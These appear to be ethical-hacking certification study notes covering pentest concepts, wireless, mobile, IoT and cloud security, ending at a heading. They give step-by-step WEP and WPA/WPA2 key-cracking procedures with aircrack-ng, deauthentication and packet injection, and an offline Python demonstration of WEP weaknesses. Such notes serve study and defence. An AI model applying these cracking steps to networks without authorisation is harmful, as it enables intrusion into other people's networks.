*A penetration test, colloquially known as a pen test, pentest or ethical hacking, is an authorized simulated cyberattack on a computer system, performed to evaluate the security of the system.*

### Security Assessments:

- **Security Assessment** - Test performed in order to assess the level of security on a network or system.

- **Security Audit** - Policy and procedure focused; tests whether the organization is following specific standards and policies; looks at compliance only.

- **Vulnerability Assessment** - Scans and tests for vulnerabilities but does not intentionally exploit them.

- **Penetration Test** - Looks for vulnerabilities and actively seeks to exploit them.

### InfoSec Teams 🗡🛡
- 🔵 **Blue Team** *(defenders)*
  - Implement security policy
  - Implement technical controls
  - Detect and defend against the Red Team
- 🔴 **Red Team** *(attackers)*
  - Perform penetration testing
  - Act as any true outside threat in an attempt to gain unauthorized access to the client's system(s)

## Types of Pen Tests
**External assessment** - Analyzes publicly available information; conducts network scanning, enumeration and testing from the network perimeter.

**Internal Assessment** - Performed from within the organization, from various network access points.

### Pentesting boxes:
> - **Black Box** - Done **without any knowledge** of the system or network.
> - **White Box** - When the attacker **has complete knowledge** of the system, provided by the owner/target.
> - **Gray Box** - When the attacker has **some knowledge** of the system and/or network

- **Automated Testing Tools**
  - **Codenomicon** - utilizes fuzz testing that learns the tested system automatically; allows pen testers to enter new domains such as VoIP assessment, etc.
  - **Core Impact Pro** - best known, all-inclusive automated testing framework; tests everything from web applications and individual systems to network devices and wireless
  - **Metasploit** - framework for developing and executing code against a remote target machine
  - **CANVAS** - hundreds of exploits, automated exploitation system and extensive exploit development framework

### Pen test Phases
1. **Pre-Attack Phase** - Reconnaissance and data-gathering.
2. **Attack Phase** - Attempts to penetrate the network and execute attacks.
3. **Post-Attack Phase** - Cleanup to return a system to the pre-attack condition and deliver reports.

## Security Assessment Deliverables

- Usually begins with a brief to management
  - Provides information about your team and an overview of the original agreement
  - Explains what tests were done and their results
- **Comprehensive Report Parts**
  - Executive summary of the organization's security posture
  - Names of all participants and dates of tests
  - List of all findings, presented in order of risk
  - Analysis of each finding and recommended mitigation steps
  - Log files and other evidence (screenshots, etc.)
  - Example reports and methodology can be found in the **Open Source Security Testing Methodology Manual** (OSSTMM)

## Terminology

- **Types of Insiders**
  - **Pure Insider** - employee with all rights and access associated with being an employee
  - **Elevated Pure Insider** - employee who has admin privileges
  - **Insider Associate** - someone with limited authorized access such as a contractor, guard or cleaning service person
  - **Insider Affiliate** - spouse, friend or client of an employee who uses the employee's credentials to gain access
  - **Outside Affiliate** - someone outside the organization who uses an open access channel to gain access to an organization's resources

## Vulnerabilities

- **CVSS - Common Vulnerability Scoring System** - assigns a numerical score based on severity;

- **Qualitative severity rating scale:**

Rating | CVSS Score
--|--
None | 0.0
Low | 0.1 - 3.9
Medium | 4.0 - 6.9
High | 7.0 - 8.9
Critical | 9.0 - 10.0

- **CVE – Common Vulnerabilities and Exposures**
  - Is a list of publicly disclosed vulnerabilities and exposures that is maintained by MITRE.
- **NVD - National Vulnerability Database**
  - Is a database, maintained by NIST, that is fully synchronized with the MITRE CVE list; the US Government's vulnerability repository.

/16-Hacking-Wireless-Networks.md:
# Hacking Wireless Networks

## Concepts and Terminology

### BSSID
**Basic Service Set Identifier (BSSID)** - **MAC address** of the wireless access point


### SSID
**Service Set Identifier (SSID)** - Is the name of a network; a text word (<= 32 characters) that identifies the network; provides no security.

### ESSID
**Extended Service Set Identifier (ESSID)** - An extended service set (ESS) consists of all of the BSSs in the network. For all practical purposes, the ESSID identifies the same network as the SSID does. **The term SSID is used most often.**

- **802.11 Series** - defines the standards for wireless networks
- **802.15.1** - Bluetooth
- **802.15.4** - Zigbee - low power, low data rate, close proximity ad-hoc networks
- **802.16** - WiMAX - broadband wireless metropolitan area networks


- **Basic Service Set (BSS)** - communication between a single AP and its clients

- **Orthogonal Frequency-Division Multiplexing (OFDM)** - carries waves in various channels.

- **Multiple-Input Multiple-Output (MIMO)** - MIMO uses multiple antennas at the transmitting and receiving sides to improve spectral efficiency by capitalizing on transmission and spatial diversities along with multipath propagation.

- **ISM Band** - The ISM radio bands are portions of the radio spectrum reserved internationally for industrial, scientific and medical (ISM) purposes other than telecommunications. Examples of applications for the use of radio frequency (RF) energy in these bands include radio-frequency process heating, microwave ovens, and medical diathermy machines.

### **DSSS and FHSS spectrums:**
![dsss](https://www.researchgate.net/profile/Edi_Kurniawan/publication/329286286/figure/fig1/AS:698501847580681@1543547226994/Frequency-spectrum-of-a-DSSS-b-FHSS.png)
- **Direct-Sequence Spread Spectrum (DSSS)** - Combines all available waveforms into a single purpose.

- **Frequency-Hopping Spread Spectrum (FHSS)** - Is a method of transmitting radio signals by rapidly changing the carrier frequency among many distinct frequencies occupying a large spectral band.
- **Spectrum Analyzer** - verifies wireless quality, detects rogue access points and detects attacks

### **Wireless Standards**:
| Wireless Standard | Operating Speed (Mbps) | Frequency (GHz) | Modulation Type |
|-------------------|------------------------|-----------------|-----------------|
| 802.11a | 54 | 5 | OFDM |
| 802.11b | 11 | 2.4 | DSSS |
| 802.11g | 54 | 2.4 | OFDM and DSSS |
| 802.11n | 600 | 2.4 / 5 | OFDM |
| 802.11ac | 1000 | 5 | QAM |

### **Authentication**
- **Three Types of Authentication**
  - **Open System** - no authentication
  - **Shared Key Authentication** - authentication through a shared key (password)
  - **Centralized Authentication** - authentication through something like **RADIUS**
- **Association** is the act of connecting; **authentication** is the act of identifying the client

> ⚠️ **RADIUS** is a networking protocol, operating on port 1812, that provides centralized Authentication, Authorization, and Accounting (AAA or Triple A) management for users who connect to and use a network service.

### **Antenna Types:**

* **Omnidirectional antenna**
  * Signal goes in every direction, like a dome.
* **Dipole antenna**
  * Goes in two directions.
* **Directional antenna**
  * Long individual beam; increased distances.
* **Yagi antenna**
  * Very directional and high gain.
* **Parabolic antenna**
  * Focuses the signal to a single point.
* **Patch Graphic antenna**
  * Half omni (e.g. mounted on a wall to get signals from one side).

## Wireless Encryption Schemes

## Wireless Security
### **WEP** - Wired Equivalent Privacy

* 64/128 bit RC4 ICV
* **RC4** - Rivest Cipher 4 stream cipher algorithm
* **ICV** - Integrity Check Value

> ⚠️ Very old and insecure

### **WPA** - Wi-Fi Protected Access

* Uses RC4 with TKIP (Temporal Key Integrity Protocol)
  - The Initialization Vector (IV) is larger and is an encrypted hash
  - Every packet gets a unique 128-bit encryption key
* **Personal | WPA-PSK**
  - TKIP + **PSK**
  - 64/128 bit **RC4 MIC**
  - Everyone uses the same 256-bit key
* **Enterprise | WPA-802.1X**
  - TKIP + **RADIUS**
  - 64/128 bit **RC4 MIC**
  - Authenticates users individually with an authentication server (e.g., RADIUS)

#### About TKIP - Temporal Key Integrity Protocol
- Mixes the keys
  - Combines the secret root key with the IV
- Adds a sequence counter
  - Prevents replay attacks
- Implements a 64-bit Message Integrity Check
  - Protects against tampering
- TKIP has its own set of vulnerabilities
  - Deprecated in the 802.11-2012 standard

### **WPA2** - Wi-Fi Protected Access v2

* **802.11i** IEEE standard
* Enterprise
  * CCMP + **RADIUS**
  * 128 bit **AES MIC Encryption**

* Personal
  * CCMP + **PSK** (Pre Shared Key)
  * 128 bit **AES MIC Encryption**

- AES (Advanced Encryption Standard) replaced RC4
- CCMP (Counter Mode with Cipher Block Chaining Message Authentication Code Protocol) replaced TKIP

* **About CCMP**
  - Uses AES for data confidentiality
  - 128-bit key and a 128-bit block size
  - Requires additional computing resources
  - **CCMP provides data confidentiality (AES), authentication, and access control**
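The WEP, WPA and WPA2 notes above differ mainly in IV size and integrity check. The following added example (not part of the original notes) implements RC4 inline and a simplified WEP-style frame (key-ID byte omitted; the root key, IVs and payloads are constructed values) to show three things a defender should know: how quickly a 24-bit IV space repeats, that an IV repeat under a stream cipher leaks the XOR of two plaintexts without any key, and that CRC-32 is linear and therefore no substitute for the keyed MIC that TKIP and CCMP introduced.

```python
"""Why the WEP design is weak: 24-bit IVs repeat quickly, an IV repeat under
RC4 leaks plaintext relationships, and CRC-32 is not a MAC.
Added example with constructed keys, IVs and payloads; the frame layout is a
simplified WEP-style framing (key-ID byte omitted)."""
import math
import zlib


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Standard RC4 (KSA + PRGA); returns `length` keystream bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):                   # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_frame(root_key: bytes, iv: bytes, payload: bytes) -> bytes:
    """Encrypt one frame WEP-style: per-packet key = IV || root key,
    ICV = CRC-32(payload), body = RC4(payload || ICV). Returns IV || body.
    The 3-byte IV travels in the clear, so an observer can spot repeats."""
    icv = zlib.crc32(payload).to_bytes(4, "little")
    body = payload + icv
    ks = rc4_keystream(iv + root_key, len(body))
    return iv + bytes(p ^ k for p, k in zip(body, ks))


def frames_until_iv_collision(iv_bits: int = 24, probability: float = 0.5) -> float:
    """Birthday bound: number of frames with random IVs after which the
    chance that some IV has already repeated reaches `probability`."""
    space = 2 ** iv_bits
    return math.sqrt(2 * space * math.log(1 / (1 - probability)))


def xor_of_payloads(frame_a: bytes, frame_b: bytes) -> bytes:
    """When two frames carry the same IV (hence the same keystream),
    XORing their ciphertexts cancels the keystream and yields
    payload_a XOR payload_b. No key material is needed for this."""
    if frame_a[:3] != frame_b[:3]:
        raise ValueError("IVs differ, so the keystreams differ")
    n = min(len(frame_a), len(frame_b)) - 3
    return bytes(a ^ b for a, b in zip(frame_a[3:3 + n], frame_b[3:3 + n]))


def crc32_is_linear(a: bytes, b: bytes) -> bool:
    """CRC-32 is affine over GF(2): for equal-length inputs
    crc(a ^ b) == crc(a) ^ crc(b) ^ crc(zeros). A checksum with this
    property cannot detect deliberate edits, which is why WPA added the
    keyed Michael MIC and WPA2 uses CBC-MAC inside CCMP."""
    assert len(a) == len(b), "property stated for equal-length inputs"
    zeros = bytes(len(a))
    xored = bytes(x ^ y for x, y in zip(a, b))
    return zlib.crc32(xored) == zlib.crc32(a) ^ zlib.crc32(b) ^ zlib.crc32(zeros)


if __name__ == "__main__":
    ROOT_KEY = bytes.fromhex("0102030405")       # constructed 40-bit WEP key
    IV = b"\x00\x00\x2a"                         # constructed IV, reused below
    frame_a = wep_frame(ROOT_KEY, IV, b"GET /index.html")
    frame_b = wep_frame(ROOT_KEY, IV, b"POST /login.cgi")
    print("frames until an IV repeat is likely:",
          round(frames_until_iv_collision()))
    print("payload XOR leaked by IV reuse:", xor_of_payloads(frame_a, frame_b).hex())
    print("CRC-32 is linear:", crc32_is_linear(b"GET /index.html", b"POST /login.cgi"))
```

With a 24-bit IV a busy access point is expected to repeat an IV after only a few thousand frames, which is why the 48-bit IV and keyed MIC in the WPA row matter.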

| Wireless Standard | Encryption | IV Size (Bits) | Key Length (Bits) | Integrity Check |
|-------------------|------------|----------------|-------------------|-----------------|
| WEP | RC4 | 24 | 40/104 | CRC-32 |
| WPA | RC4 + TKIP | 48 | 128 | Michael/CRC-32 |
| WPA2 | AES-CCMP | 48 | 128 | CBC-MAC (CCMP) |

---

## Wireless Hacking

- **Threats**
  - Access Control Attacks
  - Integrity Attacks
  - Confidentiality Attacks
  - Availability Attacks
  - Authentication Attacks

- **Network Discovery**
  - Wardriving, warflying, warwalking, etc.
  - Tools such as WiFiExplorer, WiFiFoFum, OpenSignalMaps, WiFinder
  - **WIGLE** - map of wireless networks
  - **NetStumbler** - tool to find networks
  - **Kismet** - wireless packet analyzer/sniffer that can be used for discovery
    - Works without sending any packets (passively)
    - Can detect access points that have not been configured
    - Works by channel hopping
    - Can discover networks not sending beacon frames
    - Can sniff packets and save them to a log file (readable by Wireshark/tcpdump)
  - **NetSurveyor** - Windows tool that offers features similar to NetStumbler and Kismet
    - Doesn't require special drivers

- **WiFi Adapter**
  - AirPcap is mentioned for Windows, but isn't made anymore
  - **pcap** - driver library for Windows
  - **libpcap** - driver library for Linux

## Wireless Attacks

- **Rogue Access Point** - Unauthorized access point plugged into a wired network. (Can be accidental)
  - Tools for Rogue AP: **Wi-Fi Pumpkin**, **Wi-Fi Pineapple**
- **Evil Twin** - A Rogue AP that is broadcasting **the same (or very similar) SSID**.
  - Also known as a mis-association attack
- **Honeyspot** - faking a well-known hotspot with a rogue AP
- **Ad Hoc Connection Attack** - connecting directly to another phone via an ad-hoc network
  - Not very successful, as the other user has to accept the connection
- **DoS Attack** - either sends de-auth packets to the AP or jams the wireless signal
  - With a de-auth, you can have the users connect to your AP instead if it has the same name
  - Jammers are very dangerous as they are illegal
- **MAC Filter** - only allows certain MAC addresses on a network
  - Easily broken because you can sniff out MAC addresses already connected and spoof them
  - Tools for spoofing include: **SMAC** and **TMAC**

## Wireless Encryption Attacks

### **WEP Cracking**
- To crack the WEP key for an access point, we need to gather lots of initialization vectors (IVs). Attackers can use injection to speed up the process by replaying packets

- **Process:**
  1. Start the wireless interface in monitor mode on the specific AP channel
  2. Test the injection capability of the wireless device to the AP
  3. Use aireplay-ng to do a fake authentication with the access point
  4. Start airodump-ng on the AP channel with a BSSID filter to collect the new unique IVs
  5. Start aireplay-ng in ARP request replay mode to inject packets
  6. Run aircrack-ng to crack the key using the IVs collected

### **WPA/WPA2 Cracking**
- Much more difficult than WEP
- Uses a constantly changing temporal key and a user-defined password
- **Key Reinstallation Attack** (KRACK) - replay attack that uses the third handshake of another device's session
- Most other attacks are simply brute-forcing the password

- **Process:**
  1. Start monitoring and find the BSSID (e.g. using `airodump-ng`)
  2. Start monitoring only that BSSID with a .cap output file
  3. The goal is to grab a WPA handshake; the attacker can wait for a client to connect to grab the handshake, or use a deauth attack to deauthenticate a client so that it reconnects.
  4. Start `aircrack-ng` with a good wordlist to brute-force the .cap file recorded in step 2.

### **Tools:**
- **Aircrack-ng Suite** - a complete suite of tools to assess WiFi network security.
  1. **Monitoring:** Packet capture and export of data to text files for further processing by third party tools.
  2. **Attacking:** Replay attacks, deauthentication, fake access points and others via packet injection.
  3. **Testing:** Checking WiFi cards and driver capabilities (capture and injection).
  - **`airodump-ng`** - Used for packet capturing of raw 802.11 frames; particularly suitable for collecting WEP IVs (Initialization Vectors) for use with aircrack-ng.
  - **`airmon-ng`** - Used to enable monitor mode on wireless interfaces.
  - **`aireplay-ng`** - Used to inject frames (ARP replay, deauthentication attack, etc.).
  - **`aircrack-ng`** - An 802.11 WEP and WPA/WPA2-PSK key cracking program.

- **Cain and Abel** - Sniffs packets and cracks passwords (may take longer)
  - Relies on statistical measures and the PTW technique to break WEP
- **Wifite** - An automated wireless attack tool.
- **KisMAC** - macOS tool to brute-force WEP or WPA passwords
- **Fern WiFi Cracker**
- **WEPAttack**
- **WEPCrack**
- **Portable Penetrator**
- **Elcomsoft's Wireless Security Auditor**
- Methods to crack include the **PTW**, **FMS**, and **Korek** techniques

## Bluetooth Attacks
- **Bluesmacking** - Denial of service against a device
- **Bluejacking** - Sending unsolicited messages
- **Bluebugging** - Remotely using a device's features
- **Bluesnarfing** - Theft of data from a device

## Wireless Sniffing

- Very similar to sniffing a wired network
- **Tools**
  - **NetStumbler**
  - **Kismet** - a network detector, packet sniffer, and IDS for 802.11 wireless LANs.
  - **OmniPeek** - provides data like Wireshark in addition to network activity and monitoring
  - **AirMagnet WiFi Analyzer Pro** - sniffer, traffic analyzer and network-auditing suite
  - **WiFi Pilot**

## Protecting Wireless Networks - Best practices

- Use 802.11i
- WPA2
- AES encryption
- MAC Filtering with ACL *(not a final solution; hackers can circumvent it)*
- Disable SSID broadcast *(not a final solution; hackers can circumvent it)*
- Use a VPN in the case of a home office (connecting externally)

⚠️ Warnings of Public / Free Wi-Fi
- Session hijacking
- Rogue APs
- Evil Twins

---

/17-Hacking-Mobile-Platforms-and-IoT.md:

# Hacking Mobile Platforms and IoT

# A) Mobile Platform Hacking

- **Three Main Avenues of Attack**
  - **Device Attacks** - browser based, SMS, application attacks, rooted/jailbroken devices
  - **Network Attacks** - DNS cache poisoning, rogue APs, packet sniffing
  - **Data Center (Cloud) Attacks** - databases, photos, etc.
- **OWASP Top 10 Mobile Risks:**
  - ![owasp-mobile](https://www.nowsecure.com/wp-content/uploads/2016/10/OWASP-Mobile-Top-10.png)
- **M1 - Improper Platform Usage** - Misuse of platform features or security controls (Android intents, TouchID, Keychain)

- **M2 - Insecure Data Storage** - Improperly stored data and data leakage

- **M3 - Insecure Communication** - Poor handshaking, incorrect SSL, clear-text communication

- **M4 - Insecure Authentication** - Failures in authenticating the end user or bad session management

- **M5 - Insufficient Cryptography** - Code that applies cryptography to an asset, but does so insufficiently (does NOT include SSL/TLS)

- **M6 - Insecure Authorization** - Failures in authorization (access rights)

- **M7 - Client Code Quality** - Catch-all for code-level implementation problems

- **M8 - Code Tampering** - Binary patching, resource modification, dynamic memory modification

- **M9 - Reverse Engineering** - Reversing core binaries to find problems and exploits

- **M10 - Extraneous Functionality** - Catch-all for backdoors that were inadvertently placed by coders

## Mobile Platforms

- **Android** - platform built by Google
  - **Rooting** - name given to the ability to have root access on an Android device
  - **Tools**
    - KingoRoot
    - TunesGo
    - OneClickRoot
    - MTK Droid
- **iOS** - platform by Apple
  - **Jailbreaking** - different levels of rooting an iOS device
  - **Tools**
    - evasi0n7
    - GeekSn0w
    - Pangu
    - Redsn0w
    - Absinthe
    - Cydia
  - **Techniques**
    - **Untethered** - kernel remains patched after reboot, with or without a system connection
    - **Semi-Tethered** - reboot no longer retains the patch; must use installed jailbreak software to re-jailbreak
    - **Tethered** - reboot removes all jailbreaking patches; phone may get into a boot loop requiring USB to repair
  - **Types**
    - **Userland exploit** - found in the system itself; gains root access; does not provide admin; can be patched by Apple
    - **iBoot exploit** - found in the bootloader called iBoot; uses a vulnerability to turn codesign off; semi-tethered; can be patched
    - **BootROM exploit** - allows access to the file system, iBoot and custom boot logos; found in the device's first bootloader; cannot be patched
- **App Store attacks** - since some app stores are not vetted, malicious apps can be placed there
- **Phishing attacks** - mobile phones have more data to be stolen and are just as vulnerable as desktops
- **Android Device Administration API** - allows for security-aware apps that may help
- **Bring Your Own Device** (BYOD) - dangerous for organizations because not all phones can be locked down by default
- **Mobile Device Management** - like group policy on Windows; helps enforce security and deploy apps from the enterprise
  - MDM solutions include XenMobile, IBM MaaS360, AirWatch and MobiControl
- **Bluetooth attacks** - if a mobile device can be connected to easily, it can fall prey to Bluetooth attacks
  - **Discovery mode** - how the device reacts to inquiries from other devices
    - **Discoverable** - answers all inquiries
    - **Limited Discoverable** - restricts the action
    - **Nondiscoverable** - ignores all inquiries
  - **Pairing mode** - how the device deals with pairing requests
    - **Pairable** - accepts all requests
    - **Nonpairable** - rejects all connection requests

## Mobile Attacks
All the other attacks presented in previous chapters apply to mobile devices too: session hijacking, browser vulnerabilities, XSS, email, SMS, phone, OS/app bugs, excessive permissions and so on, as well as vulnerabilities in connections (Bluetooth, WiFi, NFC) and encryption.
- **SMS Phishing (Smishing)** - sending texts with malicious links
  - People tend to trust these more because they happen less
  - **Trojans Available to Send**
    - Obad
    - Fakedefender
    - TRAMPS
    - ZitMo
- **Spyware**
  - Mobile Spy
  - Spyera
- Mobile platform features such as Find My iPhone, Android device tracking and the like can be hacked to find devices, etc.
- **Mobile Attack Platforms** - tools that allow you to attack from your phone
  - Network Spoofer
  - DroidSheep
  - Nmap

### Bluetooth:
- **Bluetooth Attacks**
  - **Bluesmacking** - Denial of service against a device
  - **Bluejacking** - Sending unsolicited messages
  - **Bluesniffing** - Attempt to discover Bluetooth devices
  - **Bluebugging** - Remotely using a device's features
  - **Bluesnarfing** - Theft of data from a device
  - **Blueprinting** - Collecting device information over Bluetooth

- **Bluetooth Attack Tools**
  - **BlueScanner** - finds devices around you
  - **BT Browser** - another tool for finding and enumerating devices
  - **Bluesniff** and **btCrawler** - sniffing programs with a GUI
  - **Bloover** - can perform Bluebugging
  - **PhoneSnoop** - good spyware option for BlackBerry
  - **Super Bluetooth Hack** - all-in-one package that allows you to do almost anything

## Improving Mobile Security
- Always check that the OS and apps are up to date
- Screen locks + passwords
- Secure wireless communication
- No jailbreaking or rooting
- Don't store sensitive information on mobile (like confidential company information)
- Remote desktop (e.g. Citrix)
- Use official app stores
- Anti-virus
- Remote wipe option
- Remote management
- Remote tracking

⚠️ Companies should use **MDM policies** to accomplish mobile security.
# B) IoT Architecture

### **What is IoT?**
***The Internet of Things (IoT)** describes the network of physical objects ("things") that are embedded with sensors, software, and other technologies for the purpose of connecting and exchanging data with other devices and systems over the internet.*

- Traditional fields of embedded systems, wireless sensor networks, control systems, automation (including home and building automation), and others all contribute to enabling the Internet of Things.

- ![iot](https://www.researchgate.net/profile/Akram_Hakiri/publication/281896657/figure/fig1/AS:391492888743939@1470350586428/High-level-IoT-architecture.png)

- **Three Basic Components**
  - Sensing technology
  - IoT gateways
  - The cloud

### **Methods of Communicating**
*IoT connectivity boils down to how things connect to each other. It can be wired, wireless, 4G LTE, Bluetooth, GPS, LoRa, mesh networking, RFID, WiFi, Zigbee or Z-Wave.*

- **Device to Device** - Direct communication between two devices.
- **Device to Cloud** - Communicates directly with a cloud service.
- **Device to Gateway** - Communicates with a centralized gateway that gathers data and then sends it to an application server based in the cloud.
- **Back-End Data Sharing** - Used to scale the device-to-cloud model to allow multiple devices to interact with one or more application servers.

> ⚠️ **Zigbee** and **Z-Wave** are wireless mesh networking protocols popular in home automation.

### **Edge Computing**
*Edge Computing is a distributed computing paradigm in which processing and computation are performed mainly on classified device nodes known as smart devices or edge devices, as opposed to being processed in a centralized cloud environment or data center.*
- It helps to provide server resources, data analysis, and artificial intelligence to data collection sources and cyber-physical sources like smart sensors and actuators.

> ⚠️ **Edge computing** handles data by pushing it into the cloud. **Fog Computing** is more like keeping things locally.

### **Multi-Layer Architecture of IoT**
- **Edge Technology Layer** - consists of sensors, RFID tags, readers and the devices
- **Access Gateway Layer** - first data handling, message identification and routing
- **Internet Layer** - crucial layer which serves as the main component allowing communication
- **Middleware Layer** - sits between application and hardware; handles data and device management, data analysis and aggregation
- **Application Layer** - responsible for delivery of services and data to the user

### **IoT Technology Protocols**
- **Short-Range Wireless:**
  - Bluetooth Low Energy (BLE)
  - Light-Fidelity (Li-Fi)
  - Near Field Communication (NFC)
  - QR Codes & Barcodes
  - Radio-Frequency Identification (RFID)
  - Wi-Fi / Wi-Fi Direct
  - Z-Wave
  - Zigbee
- **Medium-Range Wireless:**
  - HaLow
  - LTE-Advanced
- **Long-Range Wireless:**
  - Low-Power Wide-Area Networking (LPWAN)
  - LoRaWAN
  - Sigfox
  - Very Small Aperture Terminal (VSAT)
  - Cellular
- **Wired Communications:**
  - Ethernet
  - Power-Line Communication (PLC)
  - Multimedia over Coax Alliance (MoCA)

### **IoT Operating Systems**
- **RIOT OS** - Embedded systems, actuator boards, sensors; is energy efficient
- **ARM Mbed OS** - Mostly used on wearables and other low-powered devices
- **RealSense OS X** - Intel's depth sensing version; mostly found in cameras and other sensors
- **Nucleus RTOS** - Used in aerospace, medical and industrial applications
- **Brillo** - Android-based OS; generally found in thermostats
- **Contiki** - OS made for low-power devices; found mostly in street lighting and sound monitoring
- **Zephyr** - Option for low-power devices and devices without many resources
- **Ubuntu Core** - Used in robots and drones; known as "snappy"
- **Integrity RTOS** - Found in aerospace, medical, defense, industrial and automotive sensors
- **Apache Mynewt** - Used in devices using the Bluetooth Low Energy protocol

### **Geofencing**
*Uses GPS and RFID technologies to create a virtual geographic boundary, like around your home property. A response is then triggered any time a mobile device enters or leaves the area.*

### **Grid Computing**
Reduces costs by maximizing existing resources. This is accomplished by **using multiple machines together to solve a specific problem.**

### **Analytics of Things (AoT)**
- The analysis of IoT data, i.e. the data generated by IoT sensors and devices.

### **Industrial IoT (IIoT)**
![iiot](https://i1.wp.com/intellinium.io/wp-content/uploads/2016/12/iot_edited.png?w=800&ssl=1)

*The industrial internet of things (IIoT) refers to the extension and use of the internet of things (IoT) in industrial sectors and applications. With a strong focus on machine-to-machine (M2M) communication, big data, and machine learning, the IIoT enables industries and enterprises to have better efficiency and reliability in their operations.*

- **The IIoT encompasses industrial applications, including robotics, medical devices, and software-defined production processes.**

## IoT Vulnerabilities and Attacks:

### **OWASP Top 10 IoT Vulnerabilities (2014)**
- **I1 - Insecure Web Interface**
  - Problems such as account enumeration, weak credentials, and no account lockout
- **I2 - Insufficient Authentication/Authorization**
  - Assumes interfaces will only be exposed on internal networks, which is a flaw
- **I3 - Insecure Network Services**
  - May be susceptible to buffer overflow or DoS attacks
- **I4 - Lack of Transport Encryption/Integrity Verification**
  - Data transported without encryption
- **I5 - Privacy Concerns**
  - Due to collection of personal data
- **I6 - Insecure Cloud Interface**
  - Easy-to-guess credentials make enumeration easy
- **I7 - Insecure Mobile Interface**
  - Easy-to-guess credentials on the mobile interface
- **I8 - Insufficient Security Configurability**
  - Security settings cannot be changed, which leaves default passwords and configuration in place
- **I9 - Insecure Software/Firmware**
  - Devices that cannot be updated or that do not check for updates
- **I10 - Poor Physical Security**
  - Because of the nature of the devices, they can easily be stolen

---

### **OWASP Top 10 IoT Vulnerabilities (2018)**

- **1. Weak, guessable, or hardcoded passwords**
  - Use of easily brute-forced, publicly available, or unchangeable credentials, including backdoors in firmware or client software that grant unauthorized access to deployed systems.

- **2. Insecure network services**
  - Unneeded or insecure network services running on the device itself, especially those exposed to the internet, that compromise the confidentiality, integrity/authenticity, or availability of information or allow unauthorized remote control.

- **3. Insecure ecosystem interfaces**
  - Insecure web, backend API, cloud, or mobile interfaces in the ecosystem outside of the device that allow compromise of the device or its related components. Common issues include a lack of authentication/authorization, lacking or weak encryption, and a lack of input and output filtering.

- **4. Lack of secure update mechanism**
  - Lack of ability to securely update the device. This includes lack of firmware validation on the device, lack of secure delivery (unencrypted in transit), lack of anti-rollback mechanisms, and lack of notifications of security changes due to updates.
- **5. Use of insecure or outdated components**
  - Use of deprecated or insecure software components/libraries that could allow the device to be compromised. This includes insecure customization of operating system platforms, and the use of third-party software or hardware components from a compromised supply chain.
- **6. Insufficient privacy protection**
  - Users' personal information stored on the device or in the ecosystem that is used insecurely, improperly, or without permission.
- **7. Insecure data transfer and storage**
  - Lack of encryption or access control of sensitive data anywhere within the ecosystem, including at rest, in transit, or during processing.
- **8. Lack of device management**
  - Lack of security support on devices deployed in production, including asset management, update management, secure decommissioning, systems monitoring, and response capabilities.
- **9. Insecure default settings**
  - Devices or systems shipped with insecure default settings or lacking the ability to make the system more secure by restricting operators from modifying configurations.
- **10. Lack of physical hardening**
  - Lack of physical hardening measures, allowing potential attackers to gain sensitive information that can help in a future remote attack or take local control of the device.
---

## Common IoT Attack Areas
1. Device memory containing credentials
2. Device / ecosystem access control
3. Device physical interfaces / firmware extraction
4. Device web interface
5. Device firmware
6. Device network services
7. Device administrative interface(s)
8. Unencrypted local data storage
9. Cloud interface(s)
10. Device update mechanism(s)
11. Insecure APIs (vendor & third-party)
12. Mobile application
13. Confidentiality and integrity issues across the ecosystem
14. Network traffic

## IoT Threats
1. **DDoS Attack**
2. **HVAC System attacks** - Attacks on HVAC systems
3. **Rolling code attack** - Used to steal cars; the ability to jam a key fob's communications, steal the code and then create a subsequent code
4. **BlueBorne attack** - Attacks against Bluetooth devices
5. **Jamming attack**
6. **Remote access via backdoors**
7. **Remote access via unsecured protocols** such as TELNET
8. **Sybil attack** - Uses multiple forged identities to create the illusion of traffic; happens when an insecure computer is hijacked to claim multiple identities.
9. **Rootkits / Exploit kits**
10. **Ransomware**

> ⚠️ **Other attacks already enumerated in other sections still apply, such as MITM, ransomware, side channel, replay attack etc.**

## IoT Hacking Methodology

### **Steps**:
1. **Information Gathering** - gathering information about the devices
   - **Tools**:
     - Shodan
     - Censys
     - Thingful
     - Google

2. **Vulnerability Scanning** - same as the normal methodology; looks for vulnerabilities
   - **Tools:**
     - Nmap
     - Multi-ping
     - RIoT Vulnerability Scanner
     - Foren6 (traffic sniffer)
     - beSTORM

3. **Launching Attacks**
   - **Tools:**
     - RFCrack
     - Attify Zigbee Framework
     - HackRF
     - Firmalyzer

4. **Gaining Access** - same objectives as the normal methodology

5. **Maintaining Access** - same objectives as the normal methodology
---
## Countermeasures to help secure IoT devices:

1. Firmware updates
2. Block ALL unnecessary ports
3. Disable insecure access protocols such as TELNET
4. Only use encrypted communication protocols
5. Use strong passwords
6. Encrypt ALL data and communications coming into, being stored in and leaving the device
7. Use account lockout
8. Configuration management and baselining of devices along with compliance monitoring
9. Use multi-factor authentication
10. Disable UPnP

---

/19-Cloud Computing.md:

# Cloud Computing

## Cloud Computing Basics

- **Three Types of Service Models**:
  - **Infrastructure as a Service (IaaS)**
    - Provides virtualized computing resources
    - Third party hosts the servers with a hypervisor running the VMs as guests
    - Subscribers usually pay on a per-use basis
    - e.g. AWS, Microsoft Azure, DigitalOcean, Google Cloud
  - **Platform as a Service (PaaS)**
    - Geared towards software development
    - Hardware and software hosted by the provider
    - Provides the ability to develop without having to worry about hardware or software
    - e.g. Heroku, Salesforce
  - **Software as a Service (SaaS)**
    - Provider supplies on-demand applications to subscribers
    - Offloads the need for patch management, compatibility and version control
    - e.g. Microsoft Office 365, Dropbox storage, Google Docs

Tech stack | Type
--|--
Software | SaaS
Apps | PaaS
OS | IaaS
Virtualization | managed by provider
Storage/Networking | managed by provider

---
## Cloud Deployment Models

- **Private Cloud** - Cloud solely for use by one tenant; usually done in larger organizations.
- **Community Cloud** - Made up of infrastructure from several different entities, which may be cloud providers, business partners, and so on (a members-only type of thing).
- **Public Cloud** - Services provided over a network that is open for the public to use; Amazon S3, Microsoft Azure - open for business.
- **Hybrid Cloud** - A composition of two or more cloud deployment models.

## **NIST Cloud Architecture**
